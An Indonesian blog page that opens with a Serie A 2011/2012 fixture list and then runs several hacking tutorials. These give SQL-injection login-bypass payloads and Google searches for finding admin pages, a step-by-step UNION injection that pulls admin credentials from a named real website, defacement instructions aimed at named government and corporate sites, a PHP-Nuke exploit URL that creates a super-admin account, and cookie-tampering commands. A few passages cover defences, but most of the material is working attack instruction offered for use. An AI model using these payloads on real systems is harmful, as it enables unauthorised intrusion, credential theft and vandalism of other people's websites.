Translate This Blog

English French German Spain Italian Dutch

Russian Portuguese Japanese Korean Arabic Chinese Simplified
by : NUROFIK

Jadwal lengkap Serie A 2011/2012:

Rabu, 27 Juli 2011

Jadwal lengkap Serie A 2011/2012:
Pekan 1
Atalanta-Cesena
Bologna-Roma
Cagliari-Milan
Inter-Lecce
Lazio-Chievo
Napoli-Genoa
Novara-Palermo
Parma-Catania
Siena-Fiorentina
Udinese-Juventus

Pekan 2
Catania-Siena
Cesena-Napoli
Chievo-Novara
Fiorentina-Bologna
Genoa-Atalanta
Juventus-Parma
Lecce-Udinese
Milan-Lazio
Palermo-Inter
Roma-Cagliari

Pekan 3
Atalanta-Palermo
Bologna-Lecce
Cagliari-Novara
Catania-Cesena
Inter-Roma
Lazio-Genoa
Napoli-Milan
Parma-Chievo
Siena-Juventus
Udinese-Fiorentina

Pekan 4
Cesena-Lazio
Chievo-Napoli
Fiorentina-Parma
Genoa-Catania
Juventus-Bologna
Lecce-Atalanta
Milan-Udinese
Novara-Inter
Palermo-Cagliari
Roma-Siena

Pekan 5
Atalanta-Novara
Bologna-Inter
Cagliari-Udinese
Catania-Juventus
Chievo-Genoa
Lazio-Palermo
Milan-Cesena
Napoli-Fiorentina
Parma-Roma
Siena-Lecce

Pekan 6
Cesena-Chievo
Fiorentina-Lazio
Inter-Napoli
Juventus-Milan
Lecce-Cagliari
Novara-Catania
Palermo-Siena
Parma-Genoa
Roma-Atalanta
Udinese-Bologna

Pekan 7
Atalanta-Udinese
Cagliari-Siena
Catania-Inter
Cesena-Fiorentina
Chievo-Juventus
Genoa-Lecce
Lazio-Roma
Milan-Palermo
Napoli-Parma
Novara-Bologna

Pekan 8
Bologna-Lazio
Cagliari-Napoli
Fiorentina-Catania
Inter-Chievo
Juventus-Genoa
Lecce-Milan
Parma-Atalanta
Roma-Palermo
Siena-Cesena
Udinese-Novara

Pekan 9
Atalanta-Inter
Cesena-Cagliari
Chievo-Bologna
Genoa-Roma
Juventus-Fiorentina
Lazio-Catania
Milan-Parma
Napoli-Udinese
Novara-Siena
Palermo-Lecce

Pekan 10
Bologna-Atalanta
Cagliari-Lazio
Catania-Napoli
Fiorentina-Genoa
Inter-Juventus
Lecce-Novara
Parma-Cesena
Roma-Milan
Siena-Chievo
Udinese-Palermo

Pekan 11
Atalanta-Cagliari
Cesena-Lecce
Chievo-Fiorentina
Genoa-Inter
Lazio-Parma
Milan-Catania
Napoli-Juventus
Novara-Roma
Palermo-Bologna
Udinese-Siena

Pekan 12
Bologna-Cesena
Catania-Chievo
Fiorentina-Milan
Genoa-Novara
Inter-Cagliari
Juventus-Palermo
Napoli-Lazio
Parma-Udinese
Roma-Lecce
Siena-Atalanta

Pekan 13
Atalanta-Napoli
Cagliari-Bologna
Cesena-Genoa
Lazio-Juventus
Lecce-Catania
Milan-Chievo
Novara-Parma
Palermo-Fiorentina
Siena-Inter
Udinese-Roma

Pekan 14
Bologna-Siena
Catania-Cagliari
Chievo-Atalanta
Fiorentina-Roma
Genoa-Milan
Inter-Udinese
Juventus-Cesena
Lazio-Novara
Napoli-Lecce
Parma-Palermo

Pekan 15
Atalanta-Catania
Bologna-Milan
Cagliari-Parma
Inter-Fiorentina
Lecce-Lazio
Novara-Napoli
Palermo-Cesena
Roma-Juventus
Siena-Genoa
Udinese-Chievo

Pekan 16
Catania-Palermo
Cesena-Inter
Chievo-Cagliari
Fiorentina-Atalanta
Genoa-Bologna
Juventus-Novara
Lazio-Udinese
Milan-Siena
Napoli-Roma
Parma-Lecce

Pekan 17
Atalanta-Milan
Bologna-Catania
Cagliari-Genoa
Inter-Parma
Lecce-Juventus
Novara-Fiorentina
Palermo-Napoli
Roma-Chievo
Siena-Lazio
Udinese-Cesena

Pekan 18
Catania-Roma
Cesena-Novara
Chievo-Palermo
Fiorentina-Lecce
Genoa-Udinese
Juventus-Cagliari
Lazio-Atalanta
Milan-Inter
Napoli-Bologna
Parma-Siena

Pekan 19
Atalanta-Juventus
Bologna-Parma
Cagliari-Fiorentina
Inter-Lazio
Lecce-Chievo
Novara-Milan
Palermo-Genoa
Roma-Cesena
Siena-Napoli
Udinese-Catania (msy)
READ MORE - Jadwal lengkap Serie A 2011/2012:

SQL INJECTION 1

Rabu, 25 Mei 2011

Contoh sintaks SQL Injection

Contoh sintak SQL dalam PHP

1. $SQL = “select * from login where username =’$username’ and password = ‘$password’”; , {dari GET atau POST variable }
2. isikan password dengan string ’ or ’’ = ’
3. hasilnya maka SQL akan seperti ini = “select * from login where username = ’$username’ and password=’pass’ or ‘=′”; , { dengan SQL ini hasil selection akan selalu TRUE }
4. maka kita bisa inject sintax SQL (dalam hal ini OR) kedalam SQL



Contoh sintaks SQL Injection

1. Sintaks SQL string ‘-- setelah nama username
2. Query database awal :
Berubah menjadi :


Contoh sintaks SQL Injection

SQL Injection melalui URL, contohnya :

Penanganan SQL Injection

1. Merubah script php
2. Menggunakan MySQL_escape_string
3. Pemfilteran karakter ‘ dengan memodifikasi php.ini

1. Merubah script php

Contoh script php semula :

$query = "select id,name,email,password,type,block from user " .

"where email = '$Email' and password = '$Password'";

$hasil = mySQL_query($query, $id_mySQL);

while($row = mySQL_fetch_row($hasil))

{

$Id = $row[0];
  $name = $row[1];

$email = $row[2];

$password = $row[3];

$type = $row[4];

$block = $row[5];

}

if(strcmp($block, 'yes') == 0)

{

echo "\n";

exit();

}

else if(!empty($Id) && !empty($name) && !empty($email) && !empty($password));

Script diatas memungkinkan seseorang dapat login dengan menyisipkan perintah SQL kedalam form login. Ketika hacker menyisipkan karakter ’ or ’’ = ’ kedalam form email dan password maka akan terbentuk query sebagai berikut :
Maka dilakukan perubahan script menjadi :

$query = "select id,name,email,password,type,block from user".

"where email = '$Email'";

$hasil = mySQL_query($query, $id_mySQL);

while($row = mySQL_fetch_row($hasil))

{

$Id = $row[0];

$name = $row[1];

$email = $row[2];

$password = $row[3];

$type = $row[4];

$block = $row[5];

}

if(strcmp($block, 'yes') == 0)

{
echo "\n";

exit();

}

$pass = md5($Password);

else if((strcmp($Email,$email) == 0) && strcmp($pass,$password) == 0));

2. Menggunakan MySQL_escape_string

Merubah string yang mengandung karakter ‘ menjadi \’ misal SQL injec’tion menjadi SQL injec\’tion

Contoh : $kar = “SQL injec’tion”;

$filter = mySQL_escape_string($kar);

echo”Hasil filter : $filter”;

Hasilnya :

3. Pemfilteran karakter ‘ dengan memodifikasi php.ini

Modifikasi dilakukan dengan mengenablekan variabel magic_quotes pada php.ini sehingga menyebabkan string maupun karakter ‘ diubah menjadi \’ secara otomatis oleh php

Contoh :
Contoh script yang membatasi karakter yang bisa masukkan :

function validatepassword( input )
good_password_chars =
"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"

validatepassword = true
for i = 1 to len( input )

c = mid( input, i, 1 )
if ( InStr( good_password_chars, c ) = 0 ) then
validatepassword = false
exit function
end if
next
end function

Implementasi SQL Injection

1. Masuk ke google atau browse yg lain
2. Masukkan salah satu keyword berikut

"/admin.asp"
"/login.asp"
"/logon.asp"
"/adminlogin.asp"
"/adminlogon.asp"
"/admin_login.asp"
"/admin_logon.asp"
"/admin/admin.asp"
"/admin/login.asp"
"/admin/logon.asp"
{anda bisa menambahi sendiri sesuai keinginan anda}

3. Bukalah salah satu link yang ditemukan oleh google, kemungkinan Anda akan menjumpai sebuah halaman login (user name danpassword).
4. Masukkan kode berikut :

User name : ` or `a'='a
Password : ` or `a'='a (termasuk tanda petiknya)

5. Jika berhasil, kemungkinan Anda akan masuk ke admin panel, di mana Anda bisa menambahkan berita, mengedit user yang lain, merubah about,
dan lain-lain. Jika beruntung Anda bisa mendapatkan daftar kredit card yang banyak.
6. Jika tidak berhasil, cobalah mencari link yang lain yang ditemukan oleh google.
7. Banyak variasi kode yang mungkin, antara lain :

User name : admin
Password : ` or `a'='a
atau bisa dimasukkan ke dua–duanya misal :

‘ or 0=0 -- ; “ or 0=0 -- ; or 0=0 -- ; ‘ or 0=0 # ;

“ or 0=0 # ; ‘ or’x’=’x ; “ or “x”=”x ; ‘) or (‘x’=’x

8. Cobalah sampai berhasil hingga anda bisa masuk ke admin panel
READ MORE - SQL INJECTION 1

SQL INJECTION 2

to the point.. talk less do more

target site:

http://www.itmaasia.com/news.php?id=10

udahnya kita test apakah target kita bisa di SQLi ato gk??
caranya cukup kasih tanda ( ' ) / petik satu dibelakang url jadinya

http://www.itmaasia.com/news.php?id=10'

klo keluar tulisan error sql berarti webnya bisa di SQLi.



langkah berikutnya kita cari jumlah kolom. caranya make syntak

order by (jumlah kolom)--

kita terapkan pada site target jadinya

http://www.itmaasia.com/news.php?id=10 order by 300--

kalo ada tulisan :
Unknown column '300' in 'order clause'

itu berarti kolomnya kebanyakan kita pake ilmu ngira" jumlah kolomnya brp? harus pas misal kita kira² target kita punya kolom 26 sehingga

http://www.itmaasia.com/news.php?id=10 order by 26--

error tadi gk keluar.. kita coba lagi make kolom 27

http://www.itmaasia.com/news.php?id=10 order by 27--

dan lagi error gk kluar?? kita coba lagi make kolom 28

http://www.itmaasia.com/news.php?id=10 order by 28--

ternyata error keluar.. jadi kesimpulannya.. target kita tuh pny kolom 27 buah..

setelah kita dapet semua kolom kita urutkan kolom untuk mendapatkan "NOMOR AJAIB" caranya make syntak

depan id kasih tanda ( - )/kurang union select kolom1,2, n

penerapan dalam target kita

http://www.itmaasia.com/news.php?id=-10 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--

maka akan muncul "NOMOR AJAIB" itulah nomor yang kita gunakan untuk inject (oh iya, nomor ajaib ini tidak hanya di badan web, tetapi bisa di title web)

di target kita ngeluarin angka 3 & 11
selanjutnya kita cari versi databasenya.. caranya make syntak

@@Version pada nomor ajaib

penerapan dalam target kita (gw ambil yg 11)

http://www.itmaasia.com/news.php?id=-10 union select 1,2,3,4,5,6,7,8,9,10,@@Version,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--

muncul versi database
5.0.51b-community-nt

[quote]
catatan:
database versi 5, karena sebentar kita akan mencari informasi table dan column dari information_schema, dimana information_schema tidak terdapat di database versi 4, jadi kalau targetnya mempunyai database MySQL versi 4, yang kita lakukan yaitu menebak-nebak tablenya.[/quote]

langkah selanjutnya kita cari informasi table caranya

memasukkan perintah group_concat(table_name) didalam "angka ajaib" kemudian diakhir URL tambahkan from information_schema.tables where table_schema=database()--

penerapan dalam target kita

http://www.itmaasia.com
/news.php?id=-10%20union%20select%201,2,3,4,5,6,7,8,9,10,group_concat(table_name),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27%20from%20information_schema.tables%20where%20table_schema=database()--

nah muncul kan nama² tabel nya ada tabel admin tuh

langkah selanjutnya kita akan mengintip informasi di dalam table admin,

pertama cek column dulu di table admin dengan perintah group_concat(column_name) dan diakhir URL tambahkan from information_schema.columns where table_name='nama table'

penerapan dalam target kita

http://www.itmaasia.com/news.php?id=-10 union select 1,2,3,4,5,6,7,8,9,10,group_concat(column_name),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 from information_schema.columns where table_name='tb_admin'--

oopppsss... error!
table 'admin' harus diconvert dulu ke hexa agar dapat dibaca oleh SQL..
dengan catatan, kita harus menambahkan 0x didepan hexa agar server dapat mengetahui bahwa itu telah diconvert ke hexa..

caranya masuk ke web ini
http://www.swingnote.com/tools/texttohex.php

trus di kolom string tulis tb_admin kemudian convert
kemudian copy hexnya. lalu kita terapkan pada target kita

http://www.itmaasia.com
/news.php?id=-10%20union%20select%201,2,3,4,5,6,7,8,9,10,group_concat(column_name),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27%20from%20information_schema.columns%20where%20table_name=0x74625f61646d696e

keluarkan informasi dari tb_admin..
langkah selanjutnya kita cari id_admin & password caranya

group_concat(username,0x3a,password) tambahkan diakhir URL from admin

dimana 0x3a adalah tanda : yang telah diconvert ke hexa, agar format tampilannya username:password, dan command from admin adalah untuk menjalankan perintah untuk mengambil informasi dari table yang bernama admin..

penerapan dalam target kita

http://www.itmaasia.com/news.php?id=-10 union select 1,2,3,4,5,6,7,8,9,10,group_concat(username,0x3a,password),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 from tb_admin

wakakakakkak... dapet dech informasi login admin dan passwordnya..
sekarang kita akan login sebagai admin, namun user admin telah terenkripsi dengan MD5. cari dah cracknya......

selanjutnya terserah anda..

segala akibat ditanggung sendiri"..

Sumber Tecon Indonesia 
READ MORE - SQL INJECTION 2

SQL INJECTION 3

SQL Injection adalah salah satu jenis penyerangan yang mengijinkan user tidak sah(penyerang)untuk mengakses database server. Pada dasarnya,serangan ini difasilitasi oleh kode program anda sendiri.
teknik nya,penyerang mencoba memasukkan query (melalui field atau URL) yang akan menyebabkan database server men-generate query SQL yang tidak valid.
Pada kenyataan nya,SQL injection terbukti merupakan salah satu teknik terbaik yang sering
melumpuhkan sasarannya. Begitu penyerang berhasil menguasai kendali dataase server,ia bisa
melakukan apa saja,seperti memodifikasi atau bahkan menghapus semua data yang ada. bagaimana pun juga ,
ini bisa dicegah jika kode program anda melakukan validasi yang baik.
Sebenarnya apa bila anda teliti,teknik SQL injection sangat sederhana sekali. Akan tetapi
justru yang sering diabaikan oleh para programer,entah itu tidak tahu atau lupa.

Berikut ini beberapa contoh teknik SQL injection,implementasi,dan cara menggagalkan nya.



Single SQL Injection
walaupun penyerang awalnya mencoba memasukan query berupa pernyataan SQL,akan tetapi bukan
sembarang query. Dalam hal ini,penyerang cukup memiliki pengatahuan mengenai SQL,sebagai
contoh permulaan (maklumlah saya masih newbie ) anda memiliki kode seperti ini.

$match = false;
if (isset($_POST['submit'])) {
$nama = $_POST['nama'];
$pass = $_POST['pass'];
$sql = "SELECT nama, password FROM user WHERE
nama='$nama' AND password='$pass'";
$res = mysqli_query($db, $sql);
// jika res berhasil,dan row yang
// dikembalikan=1, set $match=true
if ($res && mysqli_query_rows($res) == 1) {
$match = true ;
mysqli_free_result($res);
}
if ($match === true) {
echo 'account match';
} else {
echo 'invalid account';
}
}


kode program diatas memang kelihatan melakukan verifikasi data, tetapi sebenarnya sangat
rapuh,penyerang bisa menggnakan query-query seperti dibawah ini,untuk melakukan akses
secara tidak sah
// mengisi field nama saja,# adalah komentar,
// yang akan mengabaikan baris setelahnya
admin'#

// mengisi nama field saja
// mengekstrak data kelokasi tertentu
'OR' 1=1 INTO DUMPFILE '/path/ke_lokasi/file.txt '#
'OR' 1=1 INTO OUTFILE '/path/ke_lokasi/file.txt '#

Bagaimapun juga,contoh contoh SQL injection diatas adalah contoh yang umum. Adapun untuk
mencegah nya menggunakan fungsi mysql_real_escape_string () atau addslashes(), seperti
yang diuraikan pada fungsi myMacig()sebelumnya

$nama = myMacig($_POST['nama']};
$pass = myMacig($_POST['pass']};


Multiple SQL injection
Contoh SQL injection lainnya adalah dengan memberikan multiple query,seperti berikut:
// $id dari method GET/POST
$sql = "SELECT * FROM buku WHERE kode='{$id}’ “;
//mengahapus isi table
0; DELETE FROM user
// membuat account baru
0; GRANT ALL ON *.* TO 'xxx@%'
Dalam kasus ini,macig quote akan mengabaikan tanda titik koma,ini sangat membahayakan 
jika menggunakan SQLite atau postgreSQL. Adapun solusi nya adalah menggunakan operator
casting untuk memastikan bahwa id harus integer.

//Simulasi nilai $_POST['id']
0; DELETE FROM user
$id = (int) myMacig($_POST['id']);

apabila anda ingin memeriksa apakah input mengandung karakter tertentu,gunakan fungsi strpos().

$nama = myMacig ($_POST ['id']);
// periksa apakah karakter ; terdapat
// di variabel $nama.
if (strpos($nama, ';' die ('Naughty Naughty,
Very Naughty...';
READ MORE - SQL INJECTION 3

CARA DEFACE WEB 1

Deface/Defacing atau cyber grafity secara umum diartikan sebagai aktifitas menodai atau
merubah ubah isi suatu halaman web dengan kalimat , image atau link tertentu yang tidak
ada sangkut pautnya dengan misi web tersebut , Biasanya hacker men-deface suatu
halaman web dengan maksud supaya eksistensinya diketahui oleh khalayak ramai.
Mungkin anda pernah dengar atau pernah mengunjungi suatu web yang terkena deface
seperti :

http://www.bandaaceh.go.id
http://www.pertamina.co.id
http://www.transtv.co.id
http://www.setkab.go.id
http://www.pom.go.id
http://www.usni.ac.id



Ternyata apabila kita perhatikan target target tersebut dengan seksama , para target
mempunyai kesamaan yaitu server web tersebut berjalan di Operating System Windows
2000 dan servernya adalah IIS 5.0/6.0.

Mungkin anda beranggapan bahwa deface server server web tersebut adalah hal yang
susah dan perlu waktu yang lama untuk menyusup ke server
tersebut , ternyata hal
tersebut adalah mudah semudah copy dan paste , silahkan ikuti langkah langkah berikut ,
dalam hal ini gw menggunakan contoh penggunaan web folder pada Windows xp


1. Buatlah suatu halaman web seperti dibawah ini atau terserah anda dengan
menggunakan tool/software terserah anda seperti Frontpage , Macromedia , Note
pad dan lain lain

2. Beri nama halaman web tersebut dengan index.html / index.asp / default.html /
default.asp atau nama lain tergantung nama file halaman pertama suatu web
terbuka atau nama terserah anda apabila hanya mau menyimpan file tersebut di
suatu web

3. Buka My computer pada desktop dan lihat icon web folder

4. Klik 2 kali pada icon web folder tersebut

5. klik 2 kali pada icon add web folder

6. Isikan URL target di popup yang muncul misalkan target kita adalah
http://www.pertamina.co.id maka isikan URL tersebut

7. klik next lalu finish
8. Klik 2 kali pada folder yang terbentuk dan anda akan melihat isi folder tersebut
dengan file file yang akan tampil pada halaman web apabila kita mengunjungi
web tersebut

9. rubah nama file pembuka web tersebut (biasanya nama file index.html atau
index.asp) dengan nama file lain seperti index_old.asp atau terserah anda ,
biasakan hal ini anda lakukan karena kita tidak bermaksud untuk merusak isi web
milik orang lain , hanya mengingatkan.

10. Copy dan paste-kan halaman web yang anda buat tadi di folder web folder yang
telah kita buat

11. Save di komputer anda.

12. Proses Deface selesai.

Untuk pembelajaran silahkan anda cari web site yang masih vurn dengan menggunakan
google searching ketikan keyword dengan kunci “allinurl:*.asp” atau apabila mau
mencari situs pemerintah ketikan keyword “web: .go.id”
Untuk para administrator web site , download-lah patch bug tersebut untuk menghindari
terjadinya deface yang sangat mudah ini dengan demikian untuk para defacer yang
hendak coba coba deface dengan cara ini dan prosesnya gagal , sudah dipastikan web siteyang hendak anda deface sudah tidak vurn lagi atau sudah di-patch.
Selamat mencoba.
  
READ MORE - CARA DEFACE WEB 1

CARA DEFACE 3 (Old Deface Situs PHP Nuke)

1.Buka situs www.google.com
2.kemudian msukkan google dork kya gene |=> allinurl:.com/nuke/index.php atau allinurl:.org/nuke/index.php
3.nah klw udh ktemutargetnya lnjut ne. contoh: www.sakaw.com/nuke/index.php
4.yg berwarna merah gnti dengan admin.php
5.jika sudah masukkan bug berikut ne dibelakang situs td:

?op=AddAuthor&add_aid=sakaw32&add_name=
God&add_pwd=anjinkliar&add_email=
skw_swat@yahoo.com@yahoo.com&add_radminsuper=1&admin=
eCcgVU5JT04gU0VMRUNUIDEvKjox
misal : www.sakaw.com/nuke/admin.php?
op=AddAuthor&add_aid=sakaw32&add_name=
God&add_pwd=anjinkliar&add_email=
skw_swat@yahoo.com&add_radminsuper=1&admin=
eCcgVU5JT04gU0VMRUNUIDEvKjox


6.kemudian akan muncul www.sakaw.com/nuke/admin.php?op=mod_author pada adress bar
7. kemudian kalian akan di suruh login, masukin id & password kalian tadi.
Masih ingat kan ?
id=sakaw32 => liat yg diatas tadi
password=anjinkliar => liat yg diatas tadi

Nah lu skrg udah masuk ke “Administration Menu” situs tsb.
so, kalian dah masuk ke situs tersebut.. tp klw tdk bsa berarti tu situs dah di path ma adminnya 
READ MORE - CARA DEFACE 3 (Old Deface Situs PHP Nuke)

JAVASCRIPT INJECTION

Javascript injection memeang tidak setenar php injection, namun kadang metode ini dibutuhkan. Pada artikel ini akan dibahas sekilas tentang bagaimana melakukan javascript injection secara sederhana.Untuk melakukan javascript injection lebih mudah bila menggunakan browser opera, karena browser ini memiliki fitur-fitur yang lengkap untuk urusan "begini" =P*
Menampilkan dan menulis sebuah cookieKadang kala sebuah website membuat cookie nya dengan javascript, nah untuk melihat cookie tersebut tanpa memanfaatkan fasilitas browser, kita dapat menggunakan perintah ini di url

javascript:alert(document.cookie);perintah`alert(..)`diatas digunakan untuk menampilkan sebuah popup box yang berisi cookie yang ada pada website tersebut.
sedangkan untuk mengganti cookie tersebut, kita dapat menggunakan perintah javascript:void(document.cookie="...");

*cara seperti diatas dapat juga digunakan untuk mengubah atau menampilkan value yang ada di formco.
menampilkan



javascript:alert(document.contoh.pass.value);

mengubah

javascript:void(document.contoh.pass.value="345");

Jika anda menggunakan browser opera, semua ini dapat dilakukan dengan mudah. Cukup tampilkan source dari web tersebut kemudian tuliskan javascript yang ingin anda jalankan pada sesudah tag lalu pilih apply changes.co.

anda ingin mengganti cookie dari suatu web, tulislah pada tag
document.cookie="qwerty";
anda ingin mengganti value dari field pada suatu form seperti contoh di atas
document.contoh.pass.value="345"
anda ingin mengganti referrer
document.referrer=http://qwerty.net;

Setelah di apply changes, maka website target anda telah dalam keadaan menjalankan javascript yang telah anda masukan tadi.
yup, itu sekilas dasar-dasar dari javascript injection. Jika tertarik lebih jauh anda bisa cari-cari referensi dari uncle google..^^ 
READ MORE - JAVASCRIPT INJECTION

 
 
 

Followers